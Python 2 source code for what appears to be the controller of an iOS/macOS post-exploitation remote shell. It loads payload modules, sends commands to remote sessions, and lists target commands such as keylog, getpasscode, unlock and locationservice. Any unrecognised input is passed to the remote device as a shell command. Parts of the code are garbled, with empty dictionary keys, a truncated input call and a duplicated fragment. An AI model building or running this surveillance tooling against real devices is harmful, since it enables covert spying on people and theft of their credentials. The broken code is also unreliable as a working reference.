def __init__(self): self.h = Helper() self.MODULES_MACOS = {} self.MODULES_MACOS_TEXT = {} self.MODULES_IOS = {} self.MODULES_IOS_TEXT = {} self.loadModules()
class ESShell: def __init__(self): self.h = Helper() self.MODULES_MACOS = {} self.MODULES_MACOS_TEXT = {} self.MODULES_IOS = {} self.MODULES_IOS_TEXT = {} self.loadModules() def loadModules(self): MACOS_CMD_DESC = {} COMMANDS_MACOS = "modules/commands/macOS" COMMANDS_IOS = "modules/commands/iOS" sys.path.append(COMMANDS_MACOS) sys.path.append(COMMANDS_IOS) #get all modules in directory for module in os.listdir(COMMANDS_MACOS): if module == '' or module[-3:] != '.py': continue m = __import__(module[:-3]).payload() #add module info to dictionary self.MODULES_MACOS_TEXT[] = self.MODULES_MACOS[] = m del module for module in os.listdir(COMMANDS_IOS): if module == '' or module[-3:] != '.py': continue m = __import__(module[:-3]).payload() #add module info to dictionary self.MODULES_IOS[] = m self.MODULES_IOS_TEXT[] = del module def showHelp(self, CDA, multiserver): def showCommand(cmd, desc): print cmd + " " * (15 - len(cmd)) + ": " + desc print "\n" + self.h.WHITEBU + "Local Commands:" + "\n" + self.h.ENDC if multiserver: showCommand("back", "detach from session") showCommand("exit", "detach and close session") showCommand("lls", "list contents of local directory") showCommand("lcd", "change local directories") showCommand("lpwd", "get current local directory") showCommand("lopen", "open local directory") showCommand("clear", "clears terminal") print "" if "i386" in CDA: print self.h.WHITEBU + "macOS Commands:" + "\n" + self.h.ENDC sorted = self.MODULES_MACOS_TEXT.keys() sorted.sort() for key in sorted: mod = self.MODULES_MACOS_TEXT[key] showCommand(mod, self.MODULES_MACOS[mod].description) print "" if "arm" in CDA: print self.h.WHITEBU + "iOS Commands:" + "\n" + self.h.ENDC sorted = self.MODULES_IOS_TEXT.keys() sorted.sort() for key in sorted: mod = self.MODULES_IOS_TEXT[key] showCommand(mod, self.MODULES_IOS[mod].description) #TODO: make these modules as well print "\n" + self.h.WHITEBU + "eggshellPro Commands:" + "\n" + self.h.ENDC showCommand("lock", "simulate lock button press") showCommand("wake", "wake device from sleeping state") showCommand("home", "simulate home button press") showCommand("doublehome", "simulate home button double press") showCommand("play", "plays music") showCommand("lastapp", "get bundle id of last app opened") showCommand("pause", "pause music") showCommand("next", "next track") showCommand("prev", "previous track") showCommand("togglemute", "programatically toggles silence switch") showCommand("ismuted", "check if we are silenced or not") showCommand( "islocked", "check if device is locked" ) #there are ways to get around this, (alwaysunlock) tweak showCommand("getpasscode", "log successfull passcode attempts") showCommand( "unlock", "unlock with passcode" ) #there are ways to get around this, (alwaysunlock) tweak showCommand("keylog", "log keystrokes") #not working inside apps...yet showCommand("keylogclear", "clear keylog data") showCommand("locationservice", "turn on or off location services") print "" def interact(self, session, server, multiserver=0): self.h.strinfo("type \"help\" for commands") while 1: try: cmdraw = raw_input( if not cmdraw or cmdraw.replace(" ", "") == "": continue except KeyboardInterrupt: print "" return -1 cmd = cmdraw.split()[0] arg = cmdraw[len(cmd) + 1:] #MARK: Local Command handling if cmd == "help": self.showHelp(session.CDA, multiserver) elif cmd == "clear": os.system(self.h.CMD_CLEAR) elif cmd == "lopen": if not arg: print "Usage: lopen localdirectory" else: if self.h.iswin: print "Not supported on windows." else: os.system("open " + arg) elif cmd == "lls": os.system(self.h.CMD_LS + " " + arg) elif cmd == "lcd": if not arg: print "Usage: lcd localdirectory/" continue try: os.chdir(arg) except: self.h.strinfo("directory not found") elif cmd == "lpwd": os.system(self.h.CMD_PWD) elif cmd == "back" and multiserver: return elif cmd == "exit": return -1 #MARK: Target command handling elif "arm" in session.CDA and cmd in self.MODULES_IOS: #tell module to execute()/prepare command command = self.MODULES_IOS[cmd].run(session, server, cmdraw) if command == "": continue cmdtype = self.MODULES_IOS[cmd].type #send the return value result = server.sendCommand(command, arg, cmdtype, session.conn) if len(result) > 0: print result continue elif "i386" in session.CDA and cmd in self.MODULES_MACOS: #tell module to execute()/prepare command command = self.MODULES_MACOS[cmd].run(session, server, cmdraw) if command == "": continue cmdtype = self.MODULES_MACOS[cmd].type #send the return value result = server.sendCommand(command, arg, cmdtype, session.conn) if len(result) > 0: print result continue else: result = server.sendCommand(cmd, arg, "shell", session.conn) if len(result) > 0: print result
import base64 import binascii import os import random import string import sys import time from StringIO import StringIO from threading import Thread sys.dont_write_bytecode = True from modules.encryption.ESEncryptor import ESEncryptor from modules.server.server import ESServer from modules.helper.helper import Helper #MARK: Globals h = Helper() shellKey = ''.join( (random.choice(string.letters + string.digits)) for x in range(32)) server = ESServer(ESEncryptor(shellKey, 16), h) BANNER_ART_TEXT = h.GREEN + """ _ ____ _____ ____ __ ____ __________ (_) __ \/ ___// __ \/ / / __ \/ _/_ __/ / / / / /\__ \/ /_/ / / / / / // / / / / / /_/ /___/ / ____/ /___/ /_/ // / / / /_/\____//____/_/ /_____/\____/___/ /_/ """ + h.RED + """ """ + h.COLOR_INFO + "" + h.RED + """ """ + h.WHITE + "\nVersion: 1.0b\nCreated By Noah Little (@noahacks)\n" + h.ENDC BANNER_MENU_TEXT = h.WHITE + "-" * 40 + "\n" + """ Options: 1): Start Server